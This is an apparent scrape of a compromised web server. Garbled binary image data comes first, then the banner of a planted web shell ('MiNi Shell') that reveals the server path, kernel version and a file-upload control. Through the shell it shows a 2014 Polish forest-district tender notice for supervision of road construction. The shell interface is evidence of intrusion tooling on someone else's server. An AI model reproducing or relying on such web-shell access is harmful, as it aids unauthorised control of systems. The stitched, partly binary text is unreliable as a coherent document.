JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140603/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140603/187546-N-2014.html

<p class="kh_header"><b>Stary Sącz: Nadzór inwestorski nad robotami budowlanymi na drogach
leśnych w PGL LP Nadleśnictwie Stary Sącz</b><br>
<b>Numer ogłoszenia: 187546 - 2014; data zamieszczenia: 03.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Stary Sącz , ul. Magazynowa 5, 33-340 Stary Sącz, woj. małopolskie, tel. 18 446 09 91, faks 18 446 09 83.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.starysacz.krakow.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nadzór inwestorski nad robotami budowlanymi na drogach
leśnych w PGL LP Nadleśnictwie Stary Sącz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest
Nadzór Inwestorski nad robotami budowlanymi na drogach leśnych w PGL LP Nadleśnictwie Stary Sącz
(łącznie z wykonywaniem obowiązków inspektora nadzoru w okresie rękojmi i gwarancji) zgodnie zprzepisami prawa budowlanego przy realizacji niżej wymienionych zadań: 1. Roboty budowlane na drogach
leśnych w PGL LP Nadleśnictwie Stary Sącz (znak sprawy SA-2710-8-14),2. Roboty budowlane na drogach
leśnych w PGL LP Nadleśnictwie Stary Sącz (znak sprawy SA-2710-9-14),Wzakresie obejmującym nadzór
inwestorski nad wyżej wymienionymi robotami budowlanymi których zakres określono w postępowaniach
przetargowych dostępnych na stronie internetowej Zamawiającego http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krakow
/nadl_stary_sacz/zamowienia_publiczne. 2) Szczegółowy zakres obowiązków Wykonawcy :a) udział w
protokolarnym przekazaniu Wykonawcy terenu robót wraz z dziennikami budowy, w dniu podpisania umowy
z Wykonawcą na realizację prac,b) reprezentowanie inwestora na budowie przez sprawowanie kontroli
zgodności jej realizacji z projektem, przepisami i obowiązującymi Polskimi Normami oraz z zasadami wiedzy
technicznej,c) sprawdzanie jakości wykonywanych robót i wbudowanych materiałów, a w szczególności
zapobieganie zastosowaniu materiałów wadliwych,d) sprawdzanie i odbiór robót budowlanych ulegających
zakryciu lub zanikających,e) potwierdzanie faktycznie wykonanych robót oraz usunięcia wad,f) udzielanie
wykonawcy informacji, wyjaśnień i wskazówek dotyczących realizacji zamówienia, potwierdzonych wpisem
do dziennika budowy dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań,
także wymagających odkrycia robót lub elementów zakrytych oraz przedstawienia ekspertyz dotyczących
prowadzonych robót budowlanych, dowodów dopuszczenia do obrotu i stosowania w budownictwie wyrobów
budowlanych oraz urządzeń technicznych,g) załatwienie wszelkich bieżących spraw formalno - prawnych
związanych z prowadzeniem i zakończeniem robót,h) dokonywanie wpisów do dziennika budowy,i)
kontrolowaniu Wykonawcy w zakresie przestrzegania zasad planu bezpieczeństwa i ochrony zdrowa oraz
przepisów BHP, ppoż. i ochrony środowiska,j) żądanie od kierownika budowy lub kierownika robót dokonania
poprawek bądż ponownego wykonania wadliwie wykonanych robót,k) wstrzymanie dalszych robót
budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądż spowodować niedopuszczalną niezgodność z projektami lub pozwoleniami na budowę,l) w razie konieczności wykonania
robót dodatkowych nieprzewidzianych umową zawartą z wykonawcą, niezwłoczne zawiadomienie o tym
fakcie Zamawiającego, który podejmie decyzje co do zlecenia tych robót Wykonawcy robót budowlanych,m)
kontrolowanie ilości i terminowości wykonywania robót,n) stwierdzenie zakończenia robót i czynne
uczestnictwo w odbiorze,o) poświadczenie terminu zakończenia robót,p) sprawdzanie pod względem
merytorycznym i formalnym oraz rachunkowym protokołów odbiorów robót w zakresie wykonanych robót, q)
sprawdzenie i potwierdzenie prawidłowości sporządzenia dokumentów rozliczeniowych oraz dokumentacji
powykonawczych w tym ewentualnych kosztorysów powykonawczych,r) udział w komisjach powołanych do
stwierdzenia ujawnionych wad, kontrolowaniu usunięcia przez Wykonawcę tych wad oraz bieżące
informowanie Zamawiającego o nieprawidłowościach s) udział w pracach komisji dotyczących przeglądów
miedzy gwarancyjnych i pogwarancyjnych,t) wykonywanie powierzonych czynności sumiennie i fachowo,
czuwaniu w imieniu Zamawiającego nad prawidłową realizacją umowy zawartej z Wykonawcą oraz
chronienie interesów Zamawiającego we wszystkich przejawach nadzoru, 3) Wykonanie przedmiotu
zamówieniami ma spełniać wymogi określone w przepisach prawnych aktualnie obowiązujących w zakresie
realizacji przedmiotu zamówienia, a w szczególności:a) Ustawy z dnia 7 lipca 1994 L Prawo Budowlane (Dz.
U. z 2010 L, nr 243, poz. 1623 z póżniejszymi zmianami );b) Ustawy z dnia 29 stycznia 2004 r. Prawo
zamówień publicznych (Dz. U z 2010 r., Nr 113, poz. 759 z póżniejszymi zmianami )..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących do 50 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1) Zamawiający wymaga wniesienia wadium 300,00 zł (słownie: trzysta zł
00-100).2) Wadium należy wnieść w formie określonej wart. 45 ust. 6 ustawy pzp.3) Wadium wnoszone w
formie niepieniężnej należy przekazać Zamawiającemu w formie oryginału w ofercie. Można również oryginał
dokumentu złożyć w siedzibie Zamawiającego (sekretariat n-ctwa) w terminie złożenia oferty określonym w
pkt. 11 niniejszej SIWZ. Kopię dokumentu należy wówczas dołączyć do oferty.4) Z treści gwarancji
(poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta. Gwarancja musi być
podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być
sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z
podaniem imienia i nazwiska). 5) Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne
żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty
zamawiającemu pełnej kwoty wadium w okolicznościach określonych wart. 46 ust. 5 ustawy Prawo
zamówień publicznych.6) Wadium musi być wniesione najpóżniej do wyznaczonego terminu tj. dnia 11
czerwca 2014 roku do godziny 10:00. Wadium wnoszone w formie pieniężnej należy wnieść przelewem na
rachunek bankowy zamawiającego nr: 72 2030 0045 1110 0000 0024 4510 z dopiskiem na blankiecie
przelewu wadium na: Roboty budowlane na drogach leśnych w PGL LP Nadleśnictwie Stary Sącz. B)
Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie do dnia 17 czerwca 2014 roku
do godziny 10:00 znajdzie się na rachunku bankowym Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymogu w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia powyższego warunku należy wykazać się
wykonaniem w okresie ostatnich 3-ch lat przed upływem terminu składania ofert a
jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonanie co
najmniej dwóch usług polegających na pełnieniu funkcji inspektora nadzoru nad
realizacją robót budowlanych z zakresu budownictwa o wartości brutto - każdej z nich
- nie mniejszej niż 50% kwoty ofertowej brutto wraz z potwierdzeniem, że roboty te
zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.W
przypadku, gdy Wykonawca dla potwierdzenia spełnienia warunków udziału w
postępowaniu przedstawi dokumenty zawierające kwoty wyrażone w walutach innych
niż złoty polski, Zamawiający przeliczy je na złoty polski. Do przeliczenia zostanie
zastosowany kurs waluty ogłoszony przez Narodowy Bank Polski na dzień
zakończenia realizacji zamówienia potwierdzającego posiadanie stosownego
doświadczenia. Ocena spełniania w/w warunków dokonana zostanie zgodnie z
formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i
oświadczeniach wyszczególnionych w punkcie 6 niniejszej SIWZ. Z treści
załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca
spełnił.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia powyższego warunku Zamawiający wymaga złożenia oświadczenia
w tym zakresie. Ocena spełniania w/w warunków dokonana zostanie zgodnie z
formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i
oświadczeniach wyszczególnionych w punkcie 6 niniejszej SIWZ. Z treści
załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca
spełnił.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia powyższego warunku Zamawiający wymaga złożenia
oświadczenia że Wykonawca dysponuje lub będzie dysponował osobami zdolnymi do
wykonania zamówienia w tym osobą na stanowisko inspektora nadzoru
inwestorskiego posiadającą wykształcenie techniczne i uprawnienia budowlane do
pełnienia samodzielnej funkcji technicznej w budownictwie w specjalności
konstrukcyjno-budowlanej oraz w specjalności drogowej lub odpowiadające im
uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów
oraz będącą członkiem Izby Inżynierów Budownictwa. W przypadku, gdy wskazane
przez Wykonawcę osoby są obywatelami państw Europejskiego Obszaru
Gospodarczego oraz Konfederacji Szwajcarskiej muszą one spełniać powyższe
wymagania. Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą
spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i
oświadczeniach wyszczególnionych w punkcie 6 niniejszej SIWZ. Z treści
załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia powyższego warunku należy: 1. wykazać posiadanie
w banku lub spółdzielczej kasie oszczędnościowo - w celu spełnienia powyższego
warunku Zamawiający wymaga złożenia oświadczenia w tym zakresie.2. przedłożyć
dowód potwierdzający ubezpieczenie od odpowiedzialności cywilnej w zakresie
prowadzonej działalności na kwotę nie mniejszą niż kwota ofertowa brutto. W
przypadku, gdy Wykonawca dla potwierdzenia spełnienia warunków udziału w
postępowaniu przedstawi dokumenty zawierające kwoty wyrażone w walutach innych
niż złoty polski, Zamawiający przeliczy je na złoty polski. Do przeliczenia zostanie
zastosowany wyliczony i ogłoszony przez Narodowy Bank Polski kurs średni waluty
na dzień wystawienia przez instytucje finansową dokumentu potwierdzającego
sytuację ekonomiczną i finansową.Ocena spełniania w/w warunków dokonana
zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w
dokumentach i oświadczeniach wyszczególnionych w punkcie 6 niniejszej SIWZ. Z
treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki
Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Istotne postanowienia umowy zawiera wzór umowy stanowiący załącznik nr 4 do SIWZ.2) Zamawiający
przewiduje wprowadzenie zmian w treści umowy w zakresie terminu wykonania przedmiotu zamówienia w
przypadkach określonych w pkt. 4 SIWZ.3) Zamawiający przewiduje możliwość dokonania zmiany
postanowień zawartej umowy w zakresie zmian ceny brutto: w przypadku zmiany stawki podatku VAT dla
robót objętych przedmiotem zamówienia w trakcie realizacji przedmiotu zamówienia; strony dokonują
odpowiedniej zmiany wynagrodzenia umownego - dotyczy to części wynagrodzenia za roboty, których w dniu
zmiany stawki podatku VAT jeszcze nie wykonano.4) Zamawiający przewiduje możliwość dokonania zmiany
postanowień zawartej umowy w zakresie zmiany zabezpieczenia umowy. Zmiana przewidziana wart. 149
ust. 1 ustawy pzp.5) Powyższe postanowienia zawarte w punkcie 16 SIWZ stanowią katalog zmian, na które
Zamawiający może wyrazić zgodę. Powyższe postanowienia nie stanowią zobowiązania Zamawiającego do
wyrażenia zgody na ich wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krakow/nadl_stary_sacz/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowe Gospodarstwo
Leśne Lasy Państwowe, Nadleśnictwo Stary Sącz, 33-340 Stary Sącz, ul. Magazynowa 5..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2014 godzina 10:00, miejsce: Państwowe Gospodarstwo
Leśne Lasy Państwowe, Nadleśnictwo Stary Sącz, 33-340 Stary Sącz, ul. Magazynowa 5, Sekretariat pokój nr 11..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1) Zamawiający dopuszcza udział Podwykonawców przy realizacji przedmiotowego
zamówienia.2) Procedurę dopuszczenia podwykonawcy do realizacji zamówienia (w tym m.in. warunki jakie
musi spełniać podwykonawca, elementy jakie muszą się znależć w umowie pomiędzy wykonawcą a
podwykonawcą tryb odsunięcia podwykonawcy od realizacji zamówienia), sposób rozliczania za usługi objęte
podwykonawstwem oraz odpowiedzialność wykonawcy za usługi wykonywane przy pomocy podwykonawcy
określa wzór umowy na realizację zamówienia - stanowiący załącznik nr 4 do niniejszego SIWZ. 1) Przedmiot
zamówienia należy zrealizować w terminie do ostatecznego odbioru robót budowlanych objętych nadzorem -
nie póżniej niż do 30 listopada 2014 r.2) Wskazane powyżej terminy realizacji zamówienia mogą ulec
zmianie, po obustronnym uzgodnieniu, w przypadku: a) zmiany terminu realizacji robót objętych nadzorem,
spowodowanych niekorzystnymi warunkami atmosferycznymi uniemożliwiającymi wykonywanie robót, w
szczególności: 1. klęski żywiołowe;2. wysoki stan wód powierzchniowych spowodowany opadami
atmosferycznymi;3. utrzymujące się niskie temperatury i pokrywa śnieżna;4. rozmiękczenie gruntu
uniemożliwiające poruszanie się sprzętu;5. wystąpienie innych zagrożeń uszkodzenia dróg dojazdowych w
wyniku transportu materiałów. b) zmiany będące następstwem okoliczności leżących po stronie
Zamawiającego, w szczególności: 1. wstrzymanie robót przez Zamawiającego na jego wyrażne żądanie).
konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej. c) inne przyczyny
zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia prac, a
w szczególności konieczność udzielenia zamówienia dodatkowego w rozumieniu przepisów PZP; d) inne
okoliczności związane z przedłużającą się procedurą przetargową mające wpływ na termin podpisania
umowy i przystąpienie do realizacji prac;e) zmiany sposobu spełnienia świadczenia co może spowodować
zmianę terminu realizacji zamówienia lub zmianę wynagrodzenia Wykonawcy. Zmiany technologiczne, w
szczególności: 1. konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań
technicznych/technologicznych niż wskazane w dokumentacji projektowej, w sytuacji, gdyby zastosowanie
przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem projektu, 2. konieczność
zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na
zmiany obowiązującego prawa. 3) Warunki dokonania zmiany: W przypadku wystąpienia którejkolwiek z
okoliczności wymienionych w pkt. 4.2)a) do 4.2)e) termin wykonania umowy może ulec odpowiedniemu
przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej
jednak niż o okres trwania tych okoliczności. 4) Określa się następujący tryb dokonywania zmian
postanowień umowy: a) Sposób inicjowania zmian - z pisemnym wnioskiem (zawierającym uzasadnienie,
stosowne opinie, notatka służbowa, protokół konieczności itd.) o dokonanie zmiany postanowień umowy
występuję odpowiednio Zamawiający do Wykonawcy lub Wykonawca do Zamawiającego. b) Wyżej
wymieniony wniosek o dokonanie zmian wymaga zgody projektanta sprawującego nadzór autorski nad
projektem oraz zatwierdzenia przez Zamawiającego. 1) Zamawiający wymaga od Wykonawcy wniesienia
zabezpieczenia należytego wykonania umowy w wysokości 5% ceny brutto wykonania przedmiotu
zamówienia podanej w ofercie w sposób przewidziany wart. 148 ustawy pzp.2) Zabezpieczenie wnoszone w
pieniądzu, wykonawca wpłaca nie póżniej niż w dniu podpisania umowy przelewem na konto Zamawiającego
nr 72 2030 0045 1110 0000 0024 4510, 3) Kwota wniesionego zabezpieczenia będzie podlegała zwrotowi po
realizacji zamówienia, w terminie 30 dni od dnia odbioru końcowego robót..</p>
